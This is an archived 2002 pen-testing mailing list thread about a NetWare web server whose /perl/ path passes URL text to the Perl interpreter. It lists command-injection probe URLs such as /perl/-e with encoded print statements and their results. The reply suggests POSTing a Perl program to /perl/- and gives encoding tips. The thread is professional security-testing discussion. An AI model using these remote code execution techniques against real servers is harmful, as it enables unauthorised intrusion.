I remember finding this on a netware server that I was auditing. Essentially, it is a path mapping that executes the rest of the line as a perl filename. E.g. /perl/mycgi.pl actually executes "perl -- ${root}/mycgi.pl". And /perl/dir/mycgi.pl executes "perl -- ${root}/dir/mycgi.pl" I'm guessing about the "--", but that is what I'd do. It would also explain why the rest of your options "-h", etc failed. One thing you could try, which I've just noticed in the perlrun manpage: Try POSTing your program to the following URL /perl/- Might be equivalent to: 0 $ echo 'print "hello world\n";' | perl -- - hello world 0 $ You would obviously have to think about encoding your program to pass HTTP %-encoding rules, and substitute spaces with +, etc. There were some nice suggestions on this list a while back as to how to write a perl program without any spaces in it - I've not got time to search for it though :-) Good luck. Let us know if it works. Rogan P.S. One thing you may want to do is print a blank line before any other output. Otherwise you may be writing headers, rather than body. -----Original Message----- From: Ralph Los [mailto:RLosat_private] Sent: 18 December 2002 10:29 PM To: Pen-testat_private Subject: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested. Sensitivity: Confidential Hey - let me re-open a thread again, if you folks don't mind. I've found a server at one of our pen-test clients with this NetWare HTTP/HTTPS server. I've been trying to figure out a way to make it tango, but have been having some problems. Here's what I've tried and where I left off, maybe someone can toss some suggestions out. Attempt: http://address/perl/-v Result: NetWare port Copyright 1998 Novell Corporation. All rights reserved. Attempt: http://address/perl/-h Result: Page not found Attempt: http://address/perl/-e%20print%20%22hello%20world%22; Result: IE just hangs there "DONE" Attempt: http://address/perl/-e%20print%201; Result: IE just hangs there "DONE" So what's up? Is this box "patched" against this form of attack somehow? Could someone throw me another idea maybe? Thanks a bunch. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Dec 19 2002 - 19:26:08 PST